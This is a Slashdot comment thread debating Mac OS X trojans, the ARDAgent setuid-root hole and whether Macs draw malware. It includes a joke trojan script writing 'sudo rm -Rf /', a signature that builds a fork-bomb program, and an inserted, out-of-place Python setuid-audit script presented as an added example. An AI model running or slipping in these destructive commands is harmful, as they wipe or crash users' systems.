    52. Re:Proof of Concept Slashdot Trojan by kestasjk · · Score: 1

      Because the ARDAgent vulnerability is really easy to patch... you can easily do it yourself and I'm sure Apple will have a patch any day.

      Gee, that's reassuring..
      --
      // MD_Update(&m,buf,j);
    53. Re:Proof of Concept Slashdot Trojan by inerlogic · · Score: 1

      the mac! she's gone from suck to blow!

    54. Re:Proof of Concept Slashdot Trojan by konohitowa · · Score: 1

      Slashdot modding at its best. The PP points out that the ARDAgent doesn't work on a fair number of systems and then responds with a reverse paraphrasing of the GP. The PP gets Flamebait. The GP gets insightful. How delicious.

      Seriously. Why haven't they corrected the modding system around here? It really wouldn't be terribly difficult. If you could only mod up and the descriptions were merely tags and didn't account for plus or minus, things would be much better. The filtering system would need some changes too - like filtering by % score.

    55. Re:Proof of Concept Slashdot Trojan by Amisinthe · · Score: 1

      There was a separate article discussing the ARDA vulnerability a few days ago if I recall. Also, and I think there was much argument about this, the perpetrator has to have physical access to the machine at some point, which makes the vulnerability almost not worth mentioning.

      Also, no one thinks Apple is invulnerable, there are just some basic security measures in place that work very well. As a Mac user, behind a firewall, I don't worry about anything*. And I won't until I have a good reason to.

      Of course, I still worry about e-mail phishing scams, but those are platform independent anyway, and even non-tech savvy people can be taught how to avoid them.

    56. Re:Proof of Concept Slashdot Trojan by Hal_Porter · · Score: 1

      Uhh, no actually, your story did not clear anything up at all

      Consider rutting ungulates or lekking in other species. What effect does a subordinate bragging have on the alpha male status of the boss or the desired alpha male status of internet trolls.

      --
      echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
    57. Re:Proof of Concept Slashdot Trojan by konohitowa · · Score: 1

      Okay - well - the GP turned itself to flamebait too. That doesn't change my basic objection. Even in the numbers...

      Currently (as I write this), the GP is 40% flamebait, 40% insightful, and 10% troll - and yet it shows as Flamebait.

      The PP is 30% informative, 20% insightful, and 50% flamebait. And it also shows as Flamebait.

      So, 2 out of 5 mods thought the GP was a worthwhile read, and fully half of mods thought the PP was a worthwhile read.

      About the only saving grace is that I can +6 filter flamebait, troll, and offtopic. Of course, that also means I get the latest turd-eating update at the front of most threads.

    58. Re:Proof of Concept Slashdot Trojan by Hal_Porter · · Score: 1

      YOU WILL OBEY ME!

      --
      echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
    59. Re:Proof of Concept Slashdot Trojan by AzureDiamond · · Score: 1

      I will obey you, Master.

    60. Re:Proof of Concept Slashdot Trojan by Hal_Porter · · Score: 1

      Excellent!

      --
      echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
    61. Re:Proof of Concept Slashdot Trojan by clang_jangle · · Score: 1

      I wouldn't sweat it. Slashdot has always been comically irrational that way, it's part of the charm. I'm still looking forward to my first "+5 Troll" mod.

      Also I'm sure we Apple users are accustomed to the haters on /., though I've never really understood them. It's just a fact that if you defend an Apple product some jackasses will mod you down, no matter how factual your information. You can really see their desperation in the rush to report every little blog post in which some "security software" producer claims to have found an OS X issue. I guess the real news is that with so many people switching to Mac or Linux the anti-malware dog-and-pony show operators find their market dwindling, but apparently the Mac haters wouldn't want to look at that. Of course many of them are probably foolish enough to actually tie up half their system resources running antivirus software, as if it will help. Superstitious people are not usually terribly bright. Oh well, sucks to be them.

      Meanwhile, laughably incorrect reporting aside -- still no malware in the wild for OS X. Ha Ha! :)



      P.S. Now that was a proper demonstration of flamebait!

      --
      Caveat Utilitor
    62. Re:Proof of Concept Slashdot Trojan by prockcore · · Score: 1

      You laugh, but I was once burned by the guy who has the 2 Replies Beneath Your Threshold" as his signature. Of course I only got hit by it once.

    63. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      Congratulations, you have been successfully trolled. Those who post the 'actual' SSN and then complain about not being able to remove it are joking in the exact same way those who post the X's are. L24chan

      Are you sure it wasn't "Stupidity is hereditary" your father always said, usually before trying to lick his ear?

    64. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      poop

    65. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      While you're at it, also fix the bug that keeps telling me to try again even though the CAPTCHA is correct because it thinks I'm a script for some reason. There doesn't seem to be any standard waiting period and I've lost a lot of posts that way.

  5. Lame by grusin · · Score: 5, Funny

    On windows they do that without asking for password

    1. Re:Lame by ACMENEWSLLC · · Score: 1

      My father's Pc just got killed off by one of these. He was watching a video of a Jaguar for sale on eBay. Of course, they provided the necessary codec too. This resulted in Antivirus XP 2008 getting installed (malware) and they put the PC in a continual BSOD loop.

    2. Re:Lame by Anonymous Coward · · Score: 0

      The whole point of the article is they can now do this on your Mac without asking for your password too thanks to ARD.

  6. Third trojan by isorox · · Score: 0

    echo "#!/bin/bash" > coolGame.sh
    echo "sudo rm -Rf /" >> coolGame.sh
    Cool MAC OSX game!

    1. Re:Third trojan by pandrijeczko · · Score: 0

      I think you'll find that only a complete idiot would allow "sudo" access to "rm" such that it runs with root permissions. I don't use Ubuntu much (which does a lot via "sudo" by default) but would be very surprised if such a glaring security hole existed on it. You need to remember that the operation of "sudo" is controlled by a configuration file which, by default, is usually quite locked down.

      --
      Gentoo Linux - another day, another USE flag.
    2. Re:Third trojan by Anonymous Coward · · Score: 1, Insightful

      Not on Ubuntu - the sudo command in the grandparent will still do the usual rm -rf /

      Consider that a lot of people running ubuntu (myself included) would be the only users on the machines, and as such would be in the admin group. This means that effectively the same person and same password is used for both normal activities and sysadmin activities.

    3. Re:Third trojan by pandrijeczko · · Score: 1
      I'm not trying to be clever here but if that's the case then I strongly recommend you change that configuration. You may well be as experienced a UNIX/Linux user as I am but even I only ever drop to root permissions when I absolutely need to.

      To be perfectly honest with you, if you use a Linux PC as a file server (like I do) such that there are occasions when you need to delete a directory in "one hit" using rm -Rf, then you're much better off changing the ownership of those files to you first and just tightening up NFS or SAMBA (depending on how you make those files available over the LAN).

      --
      Gentoo Linux - another day, another USE flag.
    4. Re:Third trojan by isorox · · Score: 1

      I think you'll find that only a complete idiot would allow "sudo" access to "rm" such that it runs with root permissions.

      That's the default for our test OSX laptop

    5. Re:Third trojan by ohcrapitssteve · · Score: 1

      On the two major used-by-many operating systems that do a lot via sudo (Mac OS X and Ubuntu flavors) the user created at OS setup is given sudoer rights right off the bat.

      I know some bright OS X users, but only a handful of them could explain to you what sudo does.

    6. Re:Third trojan by pandrijeczko · · Score: 1
      I can't comment, I actually know of nobody that uses OS X - but that's an aside.

      However, I do accept that "sudo" can have a use in true multi-user environments but I suspect Ubuntu and OS X are mostly run by single users who have both a normal and root account on their systems. In that specific scenario, using "sudo" seems a little pointless to me as it's probably more use to better understand the pitfalls of using root if you hit the wrong key rather than worrying about configuring "sudo" to cover all the bases when it comes to not letting you do everything at root.

      --
      Gentoo Linux - another day, another USE flag.
  7. Apple spin by Centurix · · Score: 3, Funny

    iTrojan, custom trojan, personally designed by Steve Jobs' evil twin Rodney Jobs, the UI would be beautiful, white, sterile. Mass infection through Starbucks WiFi.

    --
    Task Mangler
    1. Re:Apple spin by doyoulikeworms · · Score: 5, Funny

      iTrojan - It just works.

    2. Re:Apple spin by Anonymous Coward · · Score: 0

      Then we could have the iSex that the iTrojan would protect against

    3. Re:Apple spin by Anonymous Coward · · Score: 0

      *boom* ?

    4. Re:Apple spin by AioKits · · Score: 2, Funny

      By chance, does Rodney Jobs have a goatee?

      --
      "Quote me as saying I was mis-quoted." -Groucho Marx
    5. Re:Apple spin by Wisconsingod · · Score: 1

      iTrojan - America's most trusted virus

    6. Re:Apple spin by Anonymous Coward · · Score: 0

      I was using an iTrojan last Halloween, the damn thing split, and now I have iPods everywhere!

    7. Re:Apple spin by neomunk · · Score: 2, Funny

      pssst; iSex is called "cyber" and there is NO protection that will stop your 19 y/o female bisexual cheerleader cyber-partner from turning back into the male 45 y/o laid-off McDonald's manager when "she's" done.

    8. Re:Apple spin by Mr.+Vage · · Score: 1

      Yeah, but only with the overpriced iLube. I tried using my cheaper, better nVidia 9800Glide+ and my Logilube MX518...

      I hope Apple has a 9 month return policy.

  8. Yawn by rsmith-mac · · Score: 5, Insightful

    We go through this about twice a year with the same results every time. "Someone" releases a trojan, presumably as proof that Mac OS X has security holes. Then everyone gets whipped in a frenzy and ultimately no one is infected by the damn thing in the first place. Mac OS X does have its holes (some of which are quite unreasonable), but trying to scare the users (in to buying anti-virus software, perhaps?) gets tiring after a while. No one has yet done anything that matters with these trojans and security vulnerabilities; the real troublemakers continue to target Windows.

    Mac OS X's day will definitely come at some point, but if people keep crying wolf every time someone whips up a theoretical and entirely implausible situation, no one is going to believe the security community once some black-hat does finally decide to attack the Macs.

    1. Re:Yawn by kirbysuperstar · · Score: 1

      We go through this about twice a year with the same results every time. "Someone" releases a trojan, presumably as proof that Mac OS X has security holes. Then everyone gets whipped in a frenzy and ultimately no one is infected by the damn thing in the first place.

      Is that because no-one gives a crap in the first place?
    2. Re:Yawn by tibman · · Score: 3, Insightful

      The poker game trojan sounds pretty lame too. The program must be downloaded and run first which pops open a quasi-phishing "error: type your password here to fix" message. Infection vectors seem key to how fast these things spread. Having a file mac users have to manually download first is slow/weak and I doubt the downloaded file would be manually copied to another machine and run.

      --
      http://soylentnews.org/~tibman
    3. Re:Yawn by KGIII · · Score: 5, Interesting

      At risk of being called a troll... The adage does actually apply but I will spell it out a bit. If you're going to attack then your goal is to do as much damage as you can as efficiently as you can. The vast majority of users are still using Windows. The vast majority of business data is still being transported on Windows based machines. You are as unlikely to find mass-effect malware for a Mac as you are for RiscOS, Amiga, Solaris, BSD, or Linux. The ends don't justify the means from a realistic view and if anyone thinks that malware authors are out there doing it just to "show the man" or for "fame" these days hasn't actually paid attention to the malware scene for the past five years. Today it is about blended threats, specific highly targeted attacks, gaining information as opposed to causing destruction and the goal isn't geekiness nor fame but rather is about money. Mac users are just as likely to type in their password as are Windows users. (As *NIX is not aimed at the mainstream I'd argue that *NIX users are less likely to do so, and yes, I use all the above OSes when required or have used them to play with them.)

      --
      "So long and thanks for all the fish."
    4. Re:Yawn by Simon+(S2) · · Score: 2, Insightful

      I completely agree with you, and I too think that Mac OS X's day will definitely come at some point, and that will be the time Mac has a bit more market share. At the time being it just doesn't make sense to write a large scale virus/spambot/trojan for the mac platform.
      But anyway, just to know that a Trojan is "possible" on the mac should make the mac users aware that if someone targets their machine they are just as vulnerable as a windows user (executing untrusted code locally is just bad on any platform).

      --
      I just don't trust anything that bleeds for five days and doesn't die.
    5. Re:Yawn by mentaldingo · · Score: 2, Insightful

      I think the point of TFA was to show that these things aren't theoretical and "implausible". Security isn't just about viruses: even if your so-called "troublemaker" virus-writers mostly target Windows machines, if there is a bounty on your Mac, it would be easy for someone to root it (in fact, some parts of the hack would be easier than on windows!).

    6. Re:Yawn by Anonymous Coward · · Score: 0

      Well eventually it might happen that a 0-day spreads, affecting a large number of OSX boxes. It still has to happen many other times for at least 10 years, and it must lead to the creation of an AV industry for the mac to which each user must necessarily relate. Then we can rightfully compare the OSX experience to the windows one.

    7. Re:Yawn by marcello_dl · · Score: 5, Insightful

      Except that worms for linux would find most servers on the net vulnerable- do you realize the potential for mischief?
      In fact worms for linux were produced.

      --
      ---- MISSING MISCELLANEOUS DATA SEGMENT --- [sigdash] trolololol
    8. Re:Yawn by mentaldingo · · Score: 1

      That's not true. There will be only a small market for trojans/spambots/viruses for Macs, but so far this market is largely uncatered to (or at least that's the impression I get). There would be a larger incentive for malware-writers to target OS X than Windows (where it'd be "just another" piece of malware with a tiny market share) because of this.

    9. Re:Yawn by rolfwind · · Score: 1, Insightful

      Mac OS X's day will definitely come at some point, but if people keep crying wolf every time someone whips up a theoretical and entirely implausible situation, no one is going to believe the security community once some black-hat does finally decide to attack the Macs.

      How sure are you of that proposition? Not that I think OS X is invulnerable, but perhaps OS X isn't attacked, not because of Marketshare but because Windows is just much easier. After all, I don't hear people chiming the Linux bell so much in this area even though it is being sold commercially now (gPC, eeePC, etc.) and the two are built on a similar base:

      http://www.roughlydrafted.com/2008/04/01/the-unavoidable-malware-myth-why-apple-wont-inherit-microsofts-malware-crown/

      I'm pretty sure most of MS's attacks come from it supporting legacy apps and legacy cruft and not letting go (like the damned Registry). One thing Apple never had a problem with. Linux neither in many areas.

    10. Re:Yawn by ya+really · · Score: 1

      I've come to think that viruses for Apple OS are only released to prove the statement, "Just because you're a virgin and live alone on a desert island, doesn't guarantee you won't get an STD." Now how exactly would you contract it? I'm not quite sure. Maybe a boat of Tahitian hookers shipwrecks on the island? I guess it keeps Apple from gloating its OS can't be compromised and keeps the coders on their toes, since everyone knows security through obscurity doesn't work.

    11. Re:Yawn by dhavleak · · Score: 0

      Dude -- please, for the love of god, tell me you don't believe the propaganda on roughly drafted (Daniel Eran Dilger's site).

      The motive behind malware is the same as any other commercial software -- commerce (just in a different form). The malware authors make money either by getting personal info (identity theft) or by creating bot clusters -- the bot clusters are generally used to threaten some company with a DOS attack if they don't cough up dough (blackmail essentially).

      Now that being the case, if Windows has 93% marketshare, OS-X 6%, and Linux 1% -- what platform will you choose to attack? The equation is changing for OS-X as Mac sales have been on fire for some time now, and that's why malware authors are (very slowly) starting to target it as well. It will still be some time before their share really grabs malware author's attentions, but is certainly no longer wise for OS-X users to assume they are 'automatically safe' because of their OS choice.

    12. Re:Yawn by Anonymous Coward · · Score: 0

      And servers have something called an administrator monitoring them usually
      Play again zealot troll when you will understand popular does not mean 'significant percentage' but FUCKING HUGE NUMBERS...
      the amount of linux servers compared to the amount of windows clients on the net is nil.

    13. Re:Yawn by Anonymous Coward · · Score: 0

      Hmm...attack linux servers (most profitable would be banks) who are trying their hardest to prevent you from hacking them, or attack home Windows users (to steal identities AND bank accounts AND plant botnets) who wouldn't have a clue how to stop you in the first place? Tough choice.

    14. Re:Yawn by aaaaaaargh! · · Score: 1
      As far as I can see, the only reason Macs haven't suffered from trojans and viruses so far is that the user base is not interested in writing them and that the really evil malware writers know nothing about OS X. This can change any day.

      Here is a little anecdote to illustrate how seriously Apple takes security: It took them almost two years to fix a bug in OS X 10.3 that would allow an attacker to extract the password of a file vault account from the swap file. The bug was fixed in a paid upgrade to 10.4 and all they came up with was encrypted swap, which is not the best solution. Why didn't they lock the memory to prevent it from being swapped in the first place?

      Since this incident, I personally believe that they intentionally leave security holes open.

    15. Re:Yawn by Tim+C · · Score: 4, Insightful

      Do you have any figures to back that claim up? Most servers are looked after by admins, and any admin worth their salt will at least put their machines behind a firewall, opening up only those ports that are absolutely necessary.

      Yes, some will be vulnerable, but as another poster points out the number will be utterly insignificant compared to the number of networked clients running Windows. The target simply isn't big enough to be worth the effort.

    16. Re:Yawn by Admiral+Ag · · Score: 1

      It's not that simple. If you want to attack ordinary people using their home machines (to get their credit card details and so on) attacking OS X would be a reasonably good idea. Everyone has seen those surveys which demonstrate that Mac owners tend to be wealthier than other computer users. Attacking Macs to make spambots, not so much.

      It's been 7 years now without any significant threats in the wild for OS X. That's pretty good going.

      --
      "by that I mean people who don't sit on slashdot all day wondering why everyone else isn't building robots" DECS
    17. Re:Yawn by Admiral+Ag · · Score: 4, Funny

      "Maybe a boat of Tahitian hookers shipwrecks on the island?"

      So you're the guy with the device that can read my dreams. Please stop.

      --
      "by that I mean people who don't sit on slashdot all day wondering why everyone else isn't building robots" DECS
    18. Re:Yawn by GigaplexNZ · · Score: 2, Insightful

      where it'd be "just another" piece of malware with a tiny market share

      You seem to be under the impression that a Windows box can only have one piece of malware installed at a time. This is simply not true.
    19. Re:Yawn by flnca · · Score: 1

      once some black-hat does finally decide to attack the Macs

      Unfortunately, there are already hundreds of Mac viruses. I have some super-spammed e-mail accounts, that get hundreds of infected e-mails per day, and more often than not, viruses come with ".hpx" extensions and other MacOS file extensions. Ignoring these threats could have severe consequences for a Mac user, if they would click on such a file.

      Someone could say "yeah ... but MacOS X is a Unix system, so the threat would be limited to the current user", but one should remember that MacOS X has a heavily modified BSD kernel, and custom executable formats that have some quirks. There is (or was) some well-known vulnerability in the executable file format.
    20. Re:Yawn by mentaldingo · · Score: 1

      That's not what I meant. Competition for malware on Windows will be greater, driving the price down. There is less (if any) commercial malware on the mac and so competition will be less intense and prices higher. Mac malware writers would earn more money.

    21. Re:Yawn by flnca · · Score: 1

      And servers have something called an administrator monitoring them usually

      It depends entirely on the quality of the administrator if s/he is able to detect and/or fend off threats.

      the amount of linux servers compared to the amount of windows clients on the net is nil.

      That's true in principle, but just one infected server can infect all clients. It's no problem to write a virus that goes from a Windows client to a Linux server, and from there, to other Windows clients. An infected server (if it's a mail server, for instance) can send infected spam e-mail to all the mailboxes easily. An infected web server is even more dangerous, since it can serve infected web pages to Windows clients.

      Linux server components are constantly being checked for vulnerabilities, but the "sendmail"-craze in the 90ies has shown that vulnerabilities in server software can have dire consequences. Just one exploited vulnerability can affect whole corporate networks. It doesn't help that some admins refuse to update their Un*x systems (because, sometimes, that's a lot of work). Automatic update features can alleviate that somewhat, if they're indeed being used.
    22. Re:Yawn by flnca · · Score: 1

      Some protocols reveal the version (and host platform) of the server software. This information can be used to write specialized viruses that exploits security holes in those protocols. One example of this was the "sendmail" program that was used as a mail server program for a long time. Breaking in was done using the SMTP protocol. So, just by sending an e-mail to such a server, it was possible to break in. If the admin doesn't know about these vulnerabilities, then all sorts of trouble can ensue. (many companies feel content with employing relatively unskilled admins)

    23. Re:Yawn by Anonymous Coward · · Score: 0

      Macs don't have critical mass yet to support viruses. There needs to be sufficient numbers of them in order to spread and have a semidecent shot at surviving. Even if it tries to infect another machine it only has a what, 5% chance of even hitting another mac? much less one with the particular vulnerability.
      Windows machines you have a good 90%+ chance of hitting another windows machine and much better odds at finding one with the vulnerability. Even if a patch is released on windows and 90% of people patch you STILL have more vulnerable systems than if 100% of macs had the vulnerability open.

    24. Re:Yawn by flnca · · Score: 1

      Mac viruses already make up a significant percentage of spam mail in my mailboxes (.hpx files and other fun stuff). To be blind to such threats is simply irresponsible, methinks.

    25. Re:Yawn by INT_QRK · · Score: 2, Insightful

      Your allusion to anti-virus software calls to mind a serious question that's been on my mind for some time. Since computer security software (anti-virus, anti-spyware, HIDS, NIDS, etc.) is relied upon not only to protect consumers, but industry, government, and virtually every other institution of our society, how is it not considered Critical Infrastructure, subject to government monitoring, regulation, testing, or standards of conduct and performance? I'm curious, because installing such products seems to pose a real dilemma. They often insert themselves with root-level access, call home constantly, frequently inject code onto your system without operator visibility or intervention in various forms including updated "signature files," not to mention their own patch updates, and how can one assess what activity they allow, disallow, ignore, or accept since their code and algorithms are proprietary and trade secrets? Were I a well-resourced adversary, might I not consider buying into (or infiltrating) a major institutional security software provider so that I could use it to spread my own root-kit? I may want my known performance to be otherwise impeccable, of course, to increase my market penetration, so that I could choose when and where to facilitate targeted malicious activity. I sure hope DHS, or somebody, is thinking about this.

    26. Re:Yawn by Lars+T. · · Score: 1

      Now that being the case, if Windows has 93% marketshare, OS-X 6%, and Linux 1% -- what platform will you choose to attack?

      Let's put it this way - thank God the malware authors have the same business acumen as you.
      --

      Lars T.

      To the guy who modded me down from perfect to terrible Karma - Apple haters still suck

    27. Re:Yawn by MickDownUnder · · Score: 3, Interesting

      You're almost right, but not quite.

      Today there is government backing behind state-of-the-art malware, and it is a lot more sophisticated than you give it credit for. Today's black hats are guns for hire, owning vast botnets; often they are only loosely affiliated with government agencies.

      The effectiveness of botnets is primarily measured by their ability to infiltrate and function WITHOUT doing any detectable harm. The vast percentage of compromised machines are dormant, and do NO HARM; they are only very occasionally test-fired to assess their operational status.

      The primary purpose of botnets is NOT monetary, it is political. They are rarely used to directly make money.

      Just take a look at what happened to Estonia for example...

      http://www.guardian.co.uk/world/2007/may/17/topstories3.russia [guardian.co.uk]

      Back in the 60's when the components that make up the internet were designed, the main concern was designing a network of computers that could communicate even when under attack during a time of war. Today governments have the exact opposite concern.

      The only defense mechanisms that work against today's malware are distributed ones. Short of disconnecting themselves from the internet, individuals have no hope; you just simply won't suspect the mechanism that will be used to compromise your machine.

      This is something white hats are only just coming to grips with.

      Today's hackers will be looking to gain deep penetration into aspiring OS platforms as early as they possibly can, to ensure they are in there from day one. Macs are easily popular enough to attract the interest of black hats. If you're on any machine directly or indirectly connected to the internet you should be worried about malware; Macs are definitely not immune.

    28. Re:Yawn by Tom · · Score: 5, Insightful

      Mac users are just as likely to type in their password as are Windows users.

      Evidence for that claim?

      Mac's "I need your password" dialog is better done and, more importantly, a lot less common than windos UAC. As such, most Mac users don't roll their eyes and mutter "get on with it already, moron" when it pops up. In fact, when it pops up, I either expected it to, or it surprises me enough that I actually read what it's about.

      --
      Assorted stuff I do sometimes: Lemuria.org
    29. Re:Yawn by JPRelph · · Score: 1

      Any viruses with a .hqx extension are likely to be Mac OS 9 and below viruses (i.e. Classic) that literally won't run at all on current Macs. There were viruses for Classic Mac OS, but I'm unaware of any "real" viruses (i.e. not trojans or the few proofs of concept) for OS X. Certainly nothing that could be classed as a significant threat. Not saying that there aren't issues with OS X (it always amazed me that InputManagers were never really targeted), just that there hasn't really been any seriously weaponised virus for OS X. Not yet at least.

    30. Re:Yawn by dhavleak · · Score: 1

      Everyone has seen those surveys which demonstrate that Mac owners tend to be wealthier than other computer users. They would have to be fifteen times wealthier than PC users to make up the difference. Or OS-X would have to require fifteen times fewer man-hours per exploit, for it to be worth developing exploits on it. (Or some combination thereof, but you get the picture.)
    31. Re:Yawn by stewbacca · · Score: 1

      if Windows has 93% marketshare, OS-X 6%, and Linux 1% -- what platform will you choose to attack?

      If I were a dirt-bag, scum-bucket hacker type, I'd probably really hate Macs and thus, try to attack those because of my out-of-proportion hatred towards Hipsters and Shiny Things.
    32. Re:Yawn by Poltras · · Score: 3, Insightful

      Hahaha! Have you met admins in real life? Most are incompetent, overpaid screen-lookers. I've met some that didn't know what TCP meant. A lot of them didn't care about opening only the necessary outbound ports, just inbound. And then, when you point out it's a software firewall, they can't see why the difference is important...

      This made me very sad, and I stopped working in security. I came to the true realization that demolishing a moron's bad work only made the moron build it back exactly where it was. Lazy admins don't fix vulnerabilities; they make the path around them.

      Disclaimer: I've met some brilliant admins in this world. Unfortunately, they were only a handful.

    33. Re:Yawn by Colonel+Korn · · Score: 1

      How sure are you of that proposition? Not that I think OS X is invulnerable, but perhaps OS X isn't attacked, not because of market share but because Windows is just much easier. Remember the results of the hacking contest a few months ago showing that OS X was the easiest OS to compromise.
      --
      "I zero-index my hamsters" - Willtor (147206)
    34. Re:Yawn by drinkypoo · · Score: 1

      Speaking as an Ubuntu user, I get seriously annoyed by the frequency of password prompts on the Mac. The most annoyed I get on Ubuntu is when I'm opening and closing terminal tabs and I have to keep passwording to sudo... but the graphical sudo seems to be pretty good. Lately there's been a trend to have unlock buttons in GNOME, kind of sad. I liked it much better the old way where you were either root or not. Ideally it would just prompt you if you tried to change a setting that required more access, and I'd hope there'd be more fine-grained access. Capabilities now!

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    35. Re:Yawn by jcgf · · Score: 1

      I'll stop using mine if you promise to stop dreaming about me.

    36. Re:Yawn by Penguinisto · · Score: 2, Insightful

      While the last one died off in ~2001 or so, yes, there were worms created with the intention of targeting Linux.


      Also, I wouldn't be so quick to say that all Linux machinery is looked after by professional, competent admins, either - between the expanding desktop user base and the fact that I've seen a disturbing number of incompetent admins (even where I work)? It's not that easy to dismiss.


      That said, on balance Linux is a hell of a lot harder to bust into (not PHP, Linux) than a typical Windows box of any type.

      /P

      --
      Quo usque tandem abutere, Nimbus, patientia nostra?
    37. Re:Yawn by Penguinisto · · Score: 1

      As an owner of two Macs (well, one's a Hackintosh), I'm just not going to move to be afraid - at least until I see something that doesn't require me to tie half my brain behind my back first.


      It's one thing to have something out there that can get into your machine without your knowledge or consent - those are to be respected.


      It's another entirely to have trojans (which are present for any OS in active use, really) - these require you to willfully participate in their propagation.


      Anyone pushing for fear against the latter is spreading FUD, pure and simple.

      /P

      --
      Quo usque tandem abutere, Nimbus, patientia nostra?
    38. Re:Yawn by galego · · Score: 1

      I would agree. At the same time, since botnets and taking over zombie computers are all businesses now, it stands to reason that, given the Mac's growing popularity (especially amongst naive college students), there will be some 'investment' in 'future markets', if you will. I'm certain there are some organized-crime crackers being paid to investigate cracks for the Mac that don't require at-the-console-with-an-admin-password type exploits.

      I have long worked with Macs and have been pleased to know that there are no known worms etc. "in the wild" (Yes, that is a fact, although not proof of invincibility).

      That all said ... I still live with some paranoia, use a limited permissions user as my main account .. etc. etc.

      --

      Que Deus te de em dobro o que me desejas

      [May God give you double that which you wish for me]

    39. Re:Yawn by Aram+Fingal · · Score: 4, Insightful

      I have been one of the first to point out the same thing in each of these past cases, but this is different. We have a scriptable application setuid to root. That's an obvious vulnerability on a silver platter. What was Apple thinking?

    40. Re:Yawn by Aram+Fingal · · Score: 3, Informative

      A few years ago, we had a situation where attackers were scanning the net to find machines running Irix (Silicon Graphics UNIX) because they were easy to break into. Attackers go after easy targets, not necessarily common targets.

    41. Re:Yawn by Aram+Fingal · · Score: 1

      Note that the screen shot of the poker trojan shows that the password dialog only has an "OK" button. There is no cancel. Some fraction of users are going to put in their password just because they don't see any other way to get rid of the dialog box. I've seen users do stuff like that before.

    42. Re:Yawn by Tom · · Score: 3, Insightful

      Speaking as an Ubuntu user, I get seriously annoyed by the frequency of password prompt on the mac.

      What are you doing? I regularly go for many days without seeing that prompt at all, unless you count the login screen.

      --
      Assorted stuff I do sometimes: Lemuria.org
    43. Re:Yawn by phantomfive · · Score: 4, Interesting

      The primary purpose of botnets is NOT monetary, it is political. They are rarely used to directly make money.

      Whoa, you are way off base on this one, and I refer to Misha Glenny, his book where he investigates global hacking schemes.

      Even if you think of it, the potential for profit is just too great. If you can harvest 20,000 credit cards, and only take $5 from each one (call it a service charge or something), will the people notice? If you can do it with 20,000, why not a million? Can you not imagine that this would be tempting to people? It is. Horribly tempting.

      Another example we had on Slashdot here a few years ago was a story about botnets being used to DDoS offshore gambling sites, and then ask extortion money to stop the attack. Here, check it out. There are many ways to make money with a botnet. Of course spam is another common way. Hacking is big business.
      --
      Qxe4
    44. Re:Yawn by 99BottlesOfBeerInMyF · · Score: 1

      We go through this about twice a year with the same results every time. "Someone" releases a trojan, presumably as proof that Mac OS X has security holes.

      Except in this case, that's not the only thing that has happened. Supposedly, Intego has found a trojan in the wild, which is very rare. It's not a very good trojan and we don't know how widespread or if Intego's claims about the quality are verifiable. This may be scare mongering, but at least it has a little more meat to it than a purely academic proof of concept does.

    45. Re:Yawn by NtroP · · Score: 2, Informative

      I have been one of the first to point out the same thing in each of these past cases but this is different. We have a scriptable application setuid to root. That's an obvious vulnerability on a silver platter. What was Apple thinking?

      The application in question is NOT suid on my system (Yes, I looked inside the .app too). I think it's likely that a third-party app or framework, like MacPorts or something, is responsible for making the change - "fix permissions" should take care of it - I don't think this is Apple's fault.
      --
      "terrorism" and "pedophilia" are the root passwords to the Constitution
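      Comments 39 and 45 disagree about whether the scriptable agent is installed setuid root, and comment 45 settles it by looking inside the bundle. The script below is an added example (not code from either poster, and not Apple's) of doing that check mechanically: it walks a directory tree such as an .app bundle, reports every regular file carrying the setuid or setgid bit, and flags the root-owned setuid case, which is the one that hands out root. The bundle layout and the file names in the fixture are constructed for the demonstration and stand for nothing real.

```python
"""Audit a directory tree, such as a macOS .app bundle, for files with the
setuid or setgid bit set.  Added example; it is not code from the thread."""
import os
import stat
import sys
import tempfile


def find_setuid(root):
    """Walk `root` and return (path, permission bits, owner uid) for every
    regular file whose mode carries the setuid or setgid bit.  Symlinks are
    not followed, so a link pointing outside the tree cannot produce a hit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable: skip rather than abort the audit
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, stat.S_IMODE(st.st_mode), st.st_uid))
    return hits


def is_root_setuid(hit):
    """True when the hit is a setuid file owned by uid 0: the case in which
    anyone who can drive the program gets its work done as root."""
    _path, mode, uid = hit
    return bool(mode & stat.S_ISUID) and uid == 0


def demo_bundle():
    """Constructed fixture: a throwaway directory laid out like a bundle, with
    one ordinary executable and one marked setuid.  Both are owned by the
    current user, so the fixture never represents a real root-setuid program."""
    root = tempfile.mkdtemp(prefix="example.app-")
    macos = os.path.join(root, "Contents", "MacOS")
    os.makedirs(macos)
    plain = os.path.join(macos, "helper")
    suid = os.path.join(macos, "agent")
    for p in (plain, suid):
        with open(p, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
    os.chmod(plain, 0o755)
    os.chmod(suid, 0o4755)  # set after writing, since writing can clear the bit
    return root, suid


if __name__ == "__main__":
    # Pass a bundle path to audit it; with no argument the constructed fixture is used.
    target = sys.argv[1] if len(sys.argv) > 1 else demo_bundle()[0]
    for hit in find_setuid(target):
        path, mode, uid = hit
        label = "ROOT-SETUID" if is_root_setuid(hit) else "setuid/setgid"
        print(f"{label}: {path} mode={mode:04o} uid={uid}")
```

      Run it against an application directory and an empty result is the answer comment 45 got; a root-owned hit is the situation comment 39 describes, and the usual follow-up is to confirm whether the vendor ships the file that way or something else changed the mode, as the "fix permissions" remark suggests.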
    46. Re:Yawn by Anonymous Coward · · Score: 0

      That was the second day test that required direct access to the machine so it's not exactly discouraging.

      I could also assume winning a Mac was more desirable than a PC.

      If you have real world malware/spyware, we can talk.

    47. Re:Yawn by rolfwind · · Score: 1

      Now that being the case, if Windows has 93% marketshare, OS-X 6%, and Linux 1% -- what platform will you choose to attack?

      A big pie with many fingers in it already. OS X would seem to be an attractive market, no?

